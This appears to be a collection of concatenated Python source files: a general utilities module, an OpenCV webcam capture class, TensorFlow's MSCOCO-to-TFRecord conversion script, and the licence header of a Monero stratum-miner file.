return load(flo)
def saveToFile(self, filename, format=None, **kwargs):
"""Save the object to file given by filename."""
if format is None:
# try to derive protocol from file extension
format = formatFromExtension(filename)
with file(filename, 'wb') as fp:
self.saveToFileLike(fp, format, **kwargs)
@classmethod
def loadFromFile(cls, filename, format=None):
"""Return an instance of the class that is saved in the file with the
given filename in the specified format."""
if format is None:
# try to derive protocol from file extension
format = formatFromExtension(filename)
with file(filename, 'rbU') as fp:
obj = cls.loadFromFileLike(fp, format)
obj.filename = filename
return obj
def save_pickle(self, flo, protocol=0):
pickle.dump(self, flo, protocol)
@classmethod
def load_pickle(cls, flo):
return pickle.load(flo)
class Named(XMLBuildable):
"""Class whose objects are guaranteed to have a unique name."""
_nameIds = count(0)
def getName(self):
logging.warning("Deprecated, use .name property instead.")
return self.name
def setName(self, newname):
logging.warning("Deprecated, use .name property instead.")
self.name = newname
def _getName(self):
"""Returns the name, which is generated if it has not been already."""
if self._name is None:
self._name = self._generateName()
return self._name
def _setName(self, newname):
"""Change name to newname. Uniqueness is not guaranteed anymore."""
self._name = newname
_name = None
name = property(_getName, _setName)
def _generateName(self):
"""Return a unique name for this object."""
return "%s-%i" % (self.__class__.__name__, self._nameIds.next())
def __repr__(self):
""" The default representation of a named object is its name. """
return "<%s '%s'>" % (self.__class__.__name__, self.name)
def fListToString(a_list, a_precision=3):
""" Returns a string representing a list of floats with a given precision """
s_list = ", ".join(("%g" % round(x, a_precision)).ljust(a_precision+3)
for x in a_list)
return "[%s]" % s_list
def tupleRemoveItem(tup, index):
""" remove the item at position index of the tuple and return a new tuple. """
l = list(tup)
return tuple(l[:index] + l[index + 1:])
def confidenceIntervalSize(stdev, nbsamples):
""" Determine the size of the confidence interval, given the standard deviation and the number of samples.
t-test-percentile: 97.5%, infinitely many degrees of freedom,
therefore on the two-sided interval: 95% """
# CHECKME: for better precision, maybe get the percentile dynamically, from the scipy library?
return 2 * 1.98 * stdev / sqrt(nbsamples)
def trace(func):
def inner(*args, **kwargs):
print "%s: %s, %s" % (func.__name__, args, kwargs)
return func(*args, **kwargs)
return inner
def threaded(callback=lambda * args, **kwargs: None, daemonic=False):
"""Decorate a function to run in its own thread and report the result
by calling callback with it."""
def innerDecorator(func):
def inner(*args, **kwargs):
target = lambda: callback(func(*args, **kwargs))
t = threading.Thread(target=target)
t.setDaemon(daemonic)
t.start()
return inner
return innerDecorator
def garbagecollect(func):
"""Decorate a function to invoke the garbage collector after each execution.
"""
def inner(*args, **kwargs):
result = func(*args, **kwargs)
gc.collect()
return result
return inner
def memoize(func):
"""Decorate a function to 'memoize' results by holding it in a cache that
maps call arguments to returns."""
cache = {}
def inner(*args, **kwargs):
# Dictionaries and lists are unhashable
args = tuple(args)
# Make a set for checking in the cache, since the order of
# .iteritems() is undefined
kwargs_set = frozenset(kwargs.iteritems())
if (args, kwargs_set) in cache:
result = cache[args, kwargs_set]
else:
result = func(*args, **kwargs)
cache[args, kwargs_set] = result
return result
return inner
def storeCallResults(obj, verbose=False):
"""Pseudo-decorate an object to store all evaluations of the function in the returned list."""
results = []
oldcall = obj.__class__.__call__
def newcall(*args, **kwargs):
result = oldcall(*args, **kwargs)
results.append(result)
if verbose:
print result
return result
obj.__class__.__call__ = newcall
return results
def multiEvaluate(repeat):
"""Decorate a function to evaluate repeatedly with the same arguments, and return the average result """
def decorator(func):
def inner(*args, **kwargs):
result = 0.
for dummy in range(repeat):
result += func(*args, **kwargs)
return result / repeat
return inner
return decorator
def _import(name):
"""Return module from a package.
These two are equivalent:
> from package import module as bar
> bar = _import('package.module')
"""
mod = __import__(name)
components = name.split('.')
for comp in components[1:]:
try:
mod = getattr(mod, comp)
except AttributeError:
raise ImportError("No module named %s" % mod)
return mod
# tools for binary Gray code manipulation:
def int2gray(i):
""" Returns the value of an integer in Gray encoding."""
return i ^ (i >> 1)
def gray2int(g, size):
""" Transforms a Gray code back into an integer. """
res = 0
for i in reversed(range(size)):
gi = (g >> i) % 2
if i == size - 1:
bi = gi
else:
bi = bi ^ gi
res += bi * 2 ** i
return res
def asBinary(i):
""" Produces a string from an integer's binary representation.
(preceding zeros removed). """
if i > 1:
if i % 2 == 1:
return asBinary(i >> 1) + '1'
else:
return asBinary(i >> 1) + '0'
else:
return str(i)
def one_to_n(val, maxval):
""" Returns a 1-in-n binary encoding of a non-negative integer. """
a = zeros(maxval, float)
a[val] = 1.
return a
def n_to_one(arr):
""" Returns the reverse of a 1-in-n binary encoding. """
return where(arr == 1)[0][0]
def canonicClassString(x):
""" the __class__ attribute changed from old-style to new-style classes... """
if isinstance(x, object):
return split(repr(x.__class__), "'")[1]
else:
return repr(x.__class__)
def decrementAny(tup):
""" the closest tuples to tup: decrementing by 1 along any dimension.
Never go into negatives though. """
res = []
for i, x in enumerate(tup):
if x > 0:
res.append(tuple(list(tup[:i]) + [x - 1] + list(tup[i + 1:])))
return res
def reachable(stepFunction, start, destinations, _alreadyseen=None):
""" Determines the subset of destinations that can be reached from a set of starting positions,
while using stepFunction (which produces a list of neighbor states) to navigate.
Uses breadth-first search.
Returns a dictionary with reachable destinations and their distances.
"""
if len(start) == 0 or len(destinations) == 0:
return {}
if _alreadyseen is None:
_alreadyseen = []
_alreadyseen.extend(start)
# dict with distances to destinations
res = {}
for s in start:
if s in destinations:
res[s] = 0
start.remove(s)
# do one step
new = set()
for s in start:
new.update(stepFunction(s))
new.difference_update(_alreadyseen)
ndestinations = list(destinations)
for s in list(new):
if s in destinations:
res[s] = 1
new.remove(s)
ndestinations.remove(s)
_alreadyseen.append(s)
# recursively do the rest
deeper = reachable(stepFunction, new, ndestinations, _alreadyseen)
# adjust distances
for k, val in deeper.items():
res[k] = val + 1
return res
def flood(stepFunction, fullSet, initSet, relevant=None):
""" Returns a list of elements of fullSet linked to some element of initSet
through the neighborhood-setFunction (which must be defined on all elements of fullSet).
:key relevant: (optional) list of relevant elements: stop once all relevant elements are found.
"""
if fullSet is None:
flooded = set(initSet)
else:
full = set(fullSet)
flooded = full.intersection(set(initSet))
if relevant is None:
relevant = full.copy()
if relevant:
relevant = set(relevant)
change = flooded.copy()
while len(change)>0:
new = set()
for m in change:
if fullSet is None:
new.update(stepFunction(m))
else:
new.update(full.intersection(stepFunction(m)))
change = new.difference(flooded)
flooded.update(change)
if relevant is not None and relevant.issubset(flooded):
break
return list(flooded)
def crossproduct(ss, row=None, level=0):
"""Returns the cross-product of the sets given in `ss`."""
if row is None:
row = []
if len(ss) > 1:
return reduce(operator.add,
[crossproduct(ss[1:], row + [i], level + 1) for i in ss[0]])
else:
return [row + [i] for i in ss[0]]
def permute(arr, permutation):
"""Return an array like arr but with elements permuted.
Only the first dimension is permuted, which makes it possible to permute
blocks of the input.
arr can be anything as long as it's indexable."""
return array([arr[i] for i in permutation])
def permuteToBlocks(arr, blockshape):
"""Permute an array so that it consists of linearized blocks.
Example: A two-dimensional array of the form
0 1 2 3
4 5 6 7
8 9 10 11
12 13 14 15
would be turned into an array like this with (2, 2) blocks:
0 1 4 5 2 3 6 7 8 9 12 13 10 11 14 15
"""
if len(blockshape) < 2:
raise ValueError("Need more than one dimension.")
elif len(blockshape) == 2:
blockheight, blockwidth = blockshape
return permuteToBlocks2d(arr, blockheight, blockwidth)
elif len(blockshape) == 3:
blockdepth, blockheight, blockwidth = blockshape
return permuteToBlocks3d(arr, blockdepth, blockheight, blockwidth)
else:
raise NotImplementedError("Only for dimensions 2 and 3.")
def permuteToBlocks3d(arr, blockdepth, blockheight, blockwidth):
depth, height, width = arr.shape
arr_ = arr.reshape(height * depth, width)
arr_ = permuteToBlocks2d(arr_, blockheight, blockwidth)
arr_.shape = depth, height * width
return permuteToBlocks2d(arr_, blockdepth, blockwidth * blockheight)
def permuteToBlocks2d(arr, blockheight, blockwidth):
_height, width = arr.shape
arr = arr.flatten()
new = zeros(size(arr))
for i in xrange(size(arr)):
blockx = (i % width) / blockwidth
blocky = i / width / blockheight
blockoffset = blocky * width / blockwidth + blockx
blockoffset *= blockwidth * blockheight
inblockx = i % blockwidth
inblocky = (i / width) % blockheight
j = blockoffset + inblocky * blockwidth + inblockx
new[j] = arr[i]
return new
def triu2flat(m):
""" Flattens an upper triangular matrix, returning a vector of the
non-zero elements. """
dim = m.shape[0]
res = zeros(dim * (dim + 1) / 2)
index = 0
for row in range(dim):
res[index:index + dim - row] = m[row, row:]
index += dim - row
return res
def flat2triu(a, dim):
""" Produces an upper triangular matrix of dimension dim from the elements of the given vector. """
res = zeros((dim, dim))
index = 0
for row in range(dim):
res[row, row:] = a[index:index + dim - row]
index += dim - row
return res
def blockList2Matrix(l):
""" Converts a list of matrices into a corresponding big block-diagonal one. """
dims = [m.shape[0] for m in l]
s = sum(dims)
res = zeros((s, s))
index = 0
for i in range(len(l)):
d = dims[i]
m = l[i]
res[index:index + d, index:index + d] = m
index += d
return res
def blockCombine(l):
""" Produce a matrix from a list of lists of its components. """
l = [map(mat, row) for row in l]
hdims = [m.shape[1] for m in l[0]]
hs = sum(hdims)
vdims = [row[0].shape[0] for row in l]
vs = sum(vdims)
res = zeros((hs, vs))
vindex = 0
for i, row in enumerate(l):
hindex = 0
for j, m in enumerate(row):
res[vindex:vindex + vdims[i], hindex:hindex + hdims[j]] = m
hindex += hdims[j]
vindex += vdims[i]
return res
def avgFoundAfter(decreasingTargetValues, listsOfActualValues, batchSize=1, useMedian=False):
""" Determine the average number of steps to reach a certain value (for the first time),
given a list of value sequences.
If a value is not always encountered, the length of the longest sequence is used.
Returns an array. """
from scipy import sum
numLists = len(listsOfActualValues)
longest = max(map(len, listsOfActualValues))
# gather a list of indices of first encounters
res = [[0] for _ in range(numLists)]
for tval in decreasingTargetValues:
for li, l in enumerate(listsOfActualValues):
lres = res[li]
found = False
for i in range(lres[-1], len(l)):
if l[i] <= tval:
lres.append(i)
found = True
break
if not found:
lres.append(longest)
tmp = array(res)
if useMedian:
resx = median(tmp, axis=0)[1:]
else:
resx = sum(tmp, axis=0)[1:] / float(numLists)
return resx * batchSize
class DivergenceError(Exception):
""" Raised when an algorithm diverges. """
def matchingDict(d, selection, require_existence=False):
""" Determines if the dictionary d conforms to the specified selection,
i.e. if a (key, x) is in the selection, then if key is in d as well it must be x
or contained in x (if x is a list). """
for k, v in selection.items():
if k in d:
if isinstance(v, list):
if d[k] not in v:
return False
else:
if d[k] != v:
return False
elif require_existence:
return False
return True
def subDict(d, allowedkeys, flip=False):
""" Returns a new dictionary with a subset of the entries of d
that have on of the (dis-)allowed keys."""
res = {}
for k, v in d.items():
if (k in allowedkeys) ^ flip:
res[k] = v
return res
def dictCombinations(listdict):
""" Iterates over dictionaries that go through every possible combination
of key-value pairs as specified in the lists of values for each key in listdict."""
listdict = listdict.copy()
if len(listdict) == 0:
return [{}]
k, vs = listdict.popitem()
res = dictCombinations(listdict)
if isinstance(vs, list) or isinstance(vs, tuple):
res = [dict(d, **{k:v}) for d in res for v in sorted(set(vs))]
else:
res = [dict(d, **{k:vs}) for d in res]
return res
def r_argmax(v):
""" Acts like scipy argmax, but break ties randomly. """
if len(v) == 1:
return 0
maxbid = max(v)
maxbidders = [i for (i, b) in enumerate(v) if b==maxbid]
return choice(maxbidders)
def all_argmax(x):
""" Return the indices of all values that are equal to the maximum: no breaking ties. """
m = max(x)
return [i for i, v in enumerate(x) if v == m]
def dense_orth(dim):
""" Constructs a dense orthogonal matrix. """
from scipy import rand
from scipy.linalg import orth
return orth(rand(dim, dim))
def sparse_orth(d):
""" Constructs a sparse orthogonal matrix.
The method is described in:
Gi-Sang Cheon et al., Constructions for the sparsest orthogonal matrices,
Bull. Korean Math. Soc 36 (1999) No.1 pp.199-129
"""
from scipy.sparse import eye
from scipy import r_, pi, sin, cos
if d%2 == 0:
seq = r_[0:d:2,1:d-1:2]
else:
seq = r_[0:d-1:2,1:d:2]
Q = eye(d,d).tocsc()
for i in seq:
theta = random() * 2 * pi
flip = (random() - 0.5)>0;
Qi = eye(d,d).tocsc()
Qi[i,i] = cos(theta)
Qi[(i+1),i] = sin(theta)
if flip > 0:
Qi[i,(i+1)] = -sin(theta)
Qi[(i+1),(i+1)] = cos(theta)
else:
Qi[i,(i+1)] = sin(theta)
Qi[(i+1),(i+1)] = -cos(theta)
Q = Q*Qi;
return Q
def xhash(arr):
""" Hashing function for arrays. Use with care. """
import hashlib
return hashlib.sha1(arr).hexdigest()
def binArr2int(arr):
""" Convert a binary array into its (long) integer representation. """
from numpy import packbits
tmp2 = packbits(arr.astype(int))
return sum(val * 256 ** i for i, val in enumerate(tmp2[::-1]))
def uniqueArrays(vs):
""" create a set of arrays """
resdic = {}
for v in vs:
resdic[xhash(v)] = v
return resdic.values()
def seedit(seed=0):
""" Fixed seed makes for repeatability, but there may be two different
random number generators involved. """
import random
import numpy
random.seed(seed)
numpy.random.seed(seed)
def weightedUtest(g1, w1, g2, w2):
""" Determines the confidence level of the assertion:
'The values of g2 are higher than those of g1'.
(adapted from the scipy.stats version)
Twist: here the elements of each group have associated weights,
corresponding to how often they are present (i.e. two identical entries with
weight w are equivalent to one entry with weight 2w).
Reference: "Studies in Continuous Black-box Optimization", Schaul, 2011 [appendix B].
TODO: make more efficient for large sets.
"""
from scipy.stats.distributions import norm
import numpy
n1 = sum(w1)
n2 = sum(w2)
u1 = 0.
for x1, wx1 in zip(g1, w1):
for x2, wx2 in zip(g2, w2):
if x1 == x2:
u1 += 0.5 * wx1 * wx2
elif x1 > x2:
u1 += wx1 * wx2
mu = n1*n2/2.
sigu = numpy.sqrt(n1*n2*(n1+n2+1)/12.)
z = (u1 - mu) / sigu
conf = norm.cdf(z)
return conf
|
GenericWebcam.py | #!/usr/bin/env
# coding: utf-8
# Code parts for asynchronous video capture taken from
# http://blog.blitzblit.com/2017/12/24/asynchronous-video-capture-in-python-with-opencv/
import cv2
import threading
from VIGITIA_toolkit.core.VIGITIACameraBase import VIGITIACameraBase
CAMERA_ID = 0
RES_X = 1920
RES_Y = 720
FPS = 30
class GenericWebcam(VIGITIACameraBase):
frame = None
def __init__(self, ):
super().__init__('Generic Webcam')
self.add_video_stream('color', 'bgr8', RES_X, RES_Y, FPS,
'Color Stream')
self.started = False
self.read_lock = threading.Lock()
def init_video_capture(self, camera_id=CAMERA_ID, resolution_x=RES_X, resolution_y=RES_Y, fps=FPS):
self.capture = cv2.VideoCapture(camera_id)
self.capture.set(cv2.CAP_PROP_FRAME_WIDTH, resolution_x)
self.capture.set(cv2.CAP_PROP_FRAME_HEIGHT, resolution_y)
self.capture.set(cv2.CAP_PROP_FPS, fps)
def start(self):
if self.started:
print('Already running')
return None
else:
self.started = True
self.thread = threading.Thread(target=self.update, args=())
# thread.daemon = True
self.thread.start()
return self
def update(self):
while self.started:
ret, frame = self.capture.read()
if frame is not None:
with self.read_lock:
self.frame = frame
def get_frames(self):
with self.read_lock:
return self.frame, None
def get_resolution(self):
return RES_X, RES_Y
def stop(self):
self.started = False
self.thread.join()
def __exit__(self, exec_type, exc_value, traceback):
self.capture.release()
# webcam = GenericWebcam()
# webcam.start()
#
# while True:
# frame = webcam.get_frames()
# if frame is not None:
# cv2.imshow('webcam', frame)
#
# if cv2.waitKey(1) & 0xFF == ord('q'):
# break
#
# cv2.destroyAllWindows() |
build_mscoco_data.py | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Converts MSCOCO data to TFRecord file format with SequenceExample protos.
The MSCOCO images are expected to reside in JPEG files located in the following
directory structure:
train_image_dir/COCO_train2014_000000000151.jpg
train_image_dir/COCO_train2014_000000000260.jpg
...
and
val_image_dir/COCO_val2014_000000000042.jpg
val_image_dir/COCO_val2014_000000000073.jpg
...
The MSCOCO annotations JSON files are expected to reside in train_captions_file
and val_captions_file respectively.
This script converts the combined MSCOCO data into sharded data files consisting
of 256, 4 and 8 TFRecord files, respectively:
output_dir/train-00000-of-00256
output_dir/train-00001-of-00256
...
output_dir/train-00255-of-00256
and
output_dir/val-00000-of-00004
...
output_dir/val-00003-of-00004
and
output_dir/test-00000-of-00008
...
output_dir/test-00007-of-00008
Each TFRecord file contains ~2300 records. Each record within the TFRecord file
is a serialized SequenceExample proto consisting of precisely one image-caption
pair. Note that each image has multiple captions (usually 5) and therefore each
image is replicated multiple times in the TFRecord files.
The SequenceExample proto contains the following fields:
context:
image/image_id: integer MSCOCO image identifier
image/data: string containing JPEG encoded image in RGB colorspace
feature_lists:
image/caption: list of strings containing the (tokenized) caption words
image/caption_ids: list of integer ids corresponding to the caption words
The captions are tokenized using the NLTK (http://www.nltk.org/) word tokenizer.
The vocabulary of word identifiers is constructed from the sorted list (by
descending frequency) of word tokens in the training set. Only tokens appearing
at least 4 times are considered; all other words get the "unknown" word id.
NOTE: This script will consume around 100GB of disk space because each image
in the MSCOCO dataset is replicated ~5 times (once per caption) in the output.
This is done for two reasons:
1. In order to better shuffle the training data.
2. It makes it easier to perform asynchronous preprocessing of each image in
TensorFlow.
Running this script using 16 threads may take around 1 hour on a HP Z420.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from collections import Counter
from collections import namedtuple
from datetime import datetime
import json
import os.path
import random
import sys
import threading
import nltk.tokenize
import numpy as np
import tensorflow as tf
tf.flags.DEFINE_string("train_image_dir", "/tmp/train2014/",
"Training image directory.")
tf.flags.DEFINE_string("val_image_dir", "/tmp/val2014",
"Validation image directory.")
tf.flags.DEFINE_string("train_captions_file", "/tmp/captions_train2014.json",
"Training captions JSON file.")
tf.flags.DEFINE_string("val_captions_file", "/tmp/captions_train2014.json",
"Validation captions JSON file.")
tf.flags.DEFINE_string("output_dir", "/tmp/", "Output data directory.")
tf.flags.DEFINE_integer("train_shards", 256,
"Number of shards in training TFRecord files.")
tf.flags.DEFINE_integer("val_shards", 4,
"Number of shards in validation TFRecord files.")
tf.flags.DEFINE_integer("test_shards", 8,
"Number of shards in testing TFRecord files.")
tf.flags.DEFINE_string("start_word", "<S>",
"Special word added to the beginning of each sentence.")
tf.flags.DEFINE_string("end_word", "</S>",
"Special word added to the end of each sentence.")
tf.flags.DEFINE_string("unknown_word", "<UNK>",
"Special word meaning 'unknown'.")
tf.flags.DEFINE_integer("min_word_count", 4,
"The minimum number of occurrences of each word in the "
"training set for inclusion in the vocabulary.")
tf.flags.DEFINE_string("word_counts_output_file", "/tmp/word_counts.txt",
"Output vocabulary file of word counts.")
tf.flags.DEFINE_integer("num_threads", 8,
"Number of threads to preprocess the images.")
FLAGS = tf.flags.FLAGS
ImageMetadata = namedtuple("ImageMetadata",
["image_id", "filename", "captions"])
class Vocabulary(object):
"""Simple vocabulary wrapper."""
def __init__(self, vocab, unk_id):
"""Initializes the vocabulary.
Args:
vocab: A dictionary of word to word_id.
unk_id: Id of the special 'unknown' word.
"""
self._vocab = vocab
self._unk_id = unk_id
def word_to_id(self, word):
"""Returns the integer id of a word string."""
if word in self._vocab:
return self._vocab[word]
else:
return self._unk_id
class ImageDecoder(object):
"""Helper class for decoding images in TensorFlow."""
def __init__(self):
# Create a single TensorFlow Session for all image decoding calls.
self._sess = tf.Session()
# TensorFlow ops for JPEG decoding.
self._encoded_jpeg = tf.placeholder(dtype=tf.string)
self._decode_jpeg = tf.image.decode_jpeg(self._encoded_jpeg, channels=3)
def decode_jpeg(self, encoded_jpeg):
image = self._sess.run(self._decode_jpeg,
feed_dict={self._encoded_jpeg: encoded_jpeg})
assert len(image.shape) == 3
assert image.shape[2] == 3
return image
def _int64_feature(value):
"""Wrapper for inserting an int64 Feature into a SequenceExample proto."""
return tf.train.Feature(int64_list=tf.train.Int64List(value=[value]))
def _bytes_feature(value):
"""Wrapper for inserting a bytes Feature into a SequenceExample proto."""
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[str(value)]))
def _int64_feature_list(values):
"""Wrapper for inserting an int64 FeatureList into a SequenceExample proto."""
return tf.train.FeatureList(feature=[_int64_feature(v) for v in values])
def _bytes_feature_list(values):
"""Wrapper for inserting a bytes FeatureList into a SequenceExample proto."""
return tf.train.FeatureList(feature=[_bytes_feature(v) for v in values])
def _to_sequence_example(image, decoder, vocab):
"""Builds a SequenceExample proto for an image-caption pair.
Args:
image: An ImageMetadata object.
decoder: An ImageDecoder object.
vocab: A Vocabulary object.
Returns:
A SequenceExample proto.
"""
with open(image.filename, "r") as f:
encoded_image = f.read()
try:
decoder.decode_jpeg(encoded_image)
except (tf.errors.InvalidArgumentError, AssertionError):
print("Skipping file with invalid JPEG data: %s" % image.filename)
return
context = tf.train.Features(feature={
"image/image_id": _int64_feature(image.image_id),
"image/data": _bytes_feature(encoded_image),
})
assert len(image.captions) == 1
caption = image.captions[0]
caption_ids = [vocab.word_to_id(word) for word in caption]
feature_lists = tf.train.FeatureLists(feature_list={
"image/caption": _bytes_feature_list(caption),
"image/caption_ids": _int64_feature_list(caption_ids)
})
sequence_example = tf.train.SequenceExample(
context=context, feature_lists=feature_lists)
return sequence_example
def _process_image_files(thread_index, ranges, name, images, decoder, vocab,
num_shards):
"""Processes and saves a subset of images as TFRecord files in one thread.
Args:
thread_index: Integer thread identifier within [0, len(ranges)].
ranges: A list of pairs of integers specifying the ranges of the dataset to
process in parallel.
name: Unique identifier specifying the dataset.
images: List of ImageMetadata.
decoder: An ImageDecoder object.
vocab: A Vocabulary object.
num_shards: Integer number of shards for the output files.
"""
# Each thread produces N shards where N = num_shards / num_threads. For
# instance, if num_shards = 128, and num_threads = 2, then the first thread
# would produce shards [0, 64).
num_threads = len(ranges)
assert not num_shards % num_threads
num_shards_per_batch = int(num_shards / num_threads)
shard_ranges = np.linspace(ranges[thread_index][0], ranges[thread_index][1],
num_shards_per_batch + 1).astype(int)
num_images_in_thread = ranges[thread_index][1] - ranges[thread_index][0]
counter = 0
for s in xrange(num_shards_per_batch):
# Generate a sharded version of the file name, e.g. 'train-00002-of-00010'
shard = thread_index * num_shards_per_batch + s
output_filename = "%s-%.5d-of-%.5d" % (name, shard, num_shards)
output_file = os.path.join(FLAGS.output_dir, output_filename)
writer = tf.python_io.TFRecordWriter(output_file)
shard_counter = 0
images_in_shard = np.arange(shard_ranges[s], shard_ranges[s + 1], dtype=int)
for i in images_in_shard:
image = images[i]
sequence_example = _to_sequence_example(image, decoder, vocab)
if sequence_example is not None:
writer.write(sequence_example.SerializeToString())
shard_counter += 1
counter += 1
if not counter % 1000:
print("%s [thread %d]: Processed %d of %d items in thread batch." %
(datetime.now(), thread_index, counter, num_images_in_thread))
sys.stdout.flush()
writer.close()
print("%s [thread %d]: Wrote %d image-caption pairs to %s" %
(datetime.now(), thread_index, shard_counter, output_file))
sys.stdout.flush()
shard_counter = 0
print("%s [thread %d]: Wrote %d image-caption pairs to %d shards." %
(datetime.now(), thread_index, counter, num_shards_per_batch))
sys.stdout.flush()
def _process_dataset(name, images, vocab, num_shards):
"""Processes a complete data set and saves it as a TFRecord.
Args:
name: Unique identifier specifying the dataset.
images: List of ImageMetadata.
vocab: A Vocabulary object.
num_shards: Integer number of shards for the output files.
"""
# Break up each image into a separate entity for each caption.
images = [ImageMetadata(image.image_id, image.filename, [caption])
for image in images for caption in image.captions]
# Shuffle the ordering of images. Make the randomization repeatable.
random.seed(12345)
random.shuffle(images)
# Break the images into num_threads batches. Batch i is defined as
# images[ranges[i][0]:ranges[i][1]].
num_threads = min(num_shards, FLAGS.num_threads)
spacing = np.linspace(0, len(images), num_threads + 1).astype(np.int)
ranges = []
threads = []
for i in xrange(len(spacing) - 1):
ranges.append([spacing[i], spacing[i + 1]])
# Create a mechanism for monitoring when all threads are finished.
coord = tf.train.Coordinator()
# Create a utility for decoding JPEG images to run sanity checks.
decoder = ImageDecoder()
# Launch a thread for each batch.
print("Launching %d threads for spacings: %s" % (num_threads, ranges))
for thread_index in xrange(len(ranges)):
args = (thread_index, ranges, name, images, decoder, vocab, num_shards)
t = threading.Thread(target=_process_image_files, args=args)
t.start()
threads.append(t)
# Wait for all the threads to terminate.
coord.join(threads)
print("%s: Finished processing all %d image-caption pairs in data set '%s'." %
(datetime.now(), len(images), name))
def _create_vocab(captions):
"""Creates the vocabulary of word to word_id.
The vocabulary is saved to disk in a text file of word counts. The id of each
word in the file is its corresponding 0-based line number.
Args:
captions: A list of lists of strings.
Returns:
A Vocabulary object.
"""
print("Creating vocabulary.")
counter = Counter()
for c in captions:
counter.update(c)
print("Total words:", len(counter))
# Filter uncommon words and sort by descending count.
word_counts = [x for x in counter.items() if x[1] >= FLAGS.min_word_count]
word_counts.sort(key=lambda x: x[1], reverse=True)
print("Words in vocabulary:", len(word_counts))
# Write out the word counts file.
with tf.gfile.FastGFile(FLAGS.word_counts_output_file, "w") as f:
f.write("\n".join(["%s %d" % (w, c) for w, c in word_counts]))
print("Wrote vocabulary file:", FLAGS.word_counts_output_file)
# Create the vocabulary dictionary.
reverse_vocab = [x[0] for x in word_counts]
unk_id = len(reverse_vocab)
vocab_dict = dict([(x, y) for (y, x) in enumerate(reverse_vocab)])
vocab = Vocabulary(vocab_dict, unk_id)
return vocab
def _process_caption(caption):
"""Processes a caption string into a list of tonenized words.
Args:
caption: A string caption.
Returns:
A list of strings; the tokenized caption.
"""
tokenized_caption = [FLAGS.start_word]
tokenized_caption.extend(nltk.tokenize.word_tokenize(caption.lower()))
tokenized_caption.append(FLAGS.end_word)
return tokenized_caption
def _load_and_process_metadata(captions_file, image_dir):
"""Loads image metadata from a JSON file and processes the captions.
Args:
captions_file: JSON file containing caption annotations.
image_dir: Directory containing the image files.
Returns:
A list of ImageMetadata.
"""
with tf.gfile.FastGFile(captions_file, "r") as f:
caption_data = json.load(f)
# Extract the filenames.
id_to_filename = [(x["id"], x["file_name"]) for x in caption_data["images"]]
# Extract the captions. Each image_id is associated with multiple captions.
id_to_captions = {}
for annotation in caption_data["annotations"]:
image_id = annotation["image_id"]
caption = annotation["caption"]
id_to_captions.setdefault(image_id, [])
id_to_captions[image_id].append(caption)
assert len(id_to_filename) == len(id_to_captions)
assert set([x[0] for x in id_to_filename]) == set(id_to_captions.keys())
print("Loaded caption metadata for %d images from %s" %
(len(id_to_filename), captions_file))
# Process the captions and combine the data into a list of ImageMetadata.
print("Proccessing captions.")
image_metadata = []
num_captions = 0
for image_id, base_filename in id_to_filename:
filename = os.path.join(image_dir, base_filename)
captions = [_process_caption(c) for c in id_to_captions[image_id]]
image_metadata.append(ImageMetadata(image_id, filename, captions))
num_captions += len(captions)
print("Finished processing %d captions for %d images in %s" %
(num_captions, len(id_to_filename), captions_file))
return image_metadata
def main(unused_argv):
def _is_valid_num_shards(num_shards):
"""Returns True if num_shards is compatible with FLAGS.num_threads."""
return num_shards < FLAGS.num_threads or not num_shards % FLAGS.num_threads
assert _is_valid_num_shards(FLAGS.train_shards), (
"Please make the FLAGS.num_threads commensurate with FLAGS.train_shards")
assert _is_valid_num_shards(FLAGS.val_shards), (
"Please make the FLAGS.num_threads commensurate with FLAGS.val_shards")
assert _is_valid_num_shards(FLAGS.test_shards), (
"Please make the FLAGS.num_threads commensurate with FLAGS.test_shards")
if not tf.gfile.IsDirectory(FLAGS.output_dir):
tf.gfile.MakeDirs(FLAGS.output_dir)
# Load image metadata from caption files.
mscoco_train_dataset = _load_and_process_metadata(FLAGS.train_captions_file,
FLAGS.train_image_dir)
mscoco_val_dataset = _load_and_process_metadata(FLAGS.val_captions_file,
FLAGS.val_image_dir)
# Redistribute the MSCOCO data as follows:
# train_dataset = 100% of mscoco_train_dataset + 85% of mscoco_val_dataset.
# val_dataset = 5% of mscoco_val_dataset (for validation during training).
# test_dataset = 10% of mscoco_val_dataset (for final evaluation).
train_cutoff = int(0.85 * len(mscoco_val_dataset))
val_cutoff = int(0.90 * len(mscoco_val_dataset))
train_dataset = mscoco_train_dataset + mscoco_val_dataset[0:train_cutoff]
val_dataset = mscoco_val_dataset[train_cutoff:val_cutoff]
test_dataset = mscoco_val_dataset[val_cutoff:]
# Create vocabulary from the training captions.
train_captions = [c for image in train_dataset for c in image.captions]
vocab = _create_vocab(train_captions)
_process_dataset("train", train_dataset, vocab, FLAGS.train_shards)
_process_dataset("val", val_dataset, vocab, FLAGS.val_shards)
_process_dataset("test", test_dataset, vocab, FLAGS.test_shards)
if __name__ == "__main__":
tf.app.run()
|
stratum-miner.py | # Copyright (c) 2019, The Monero Project
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
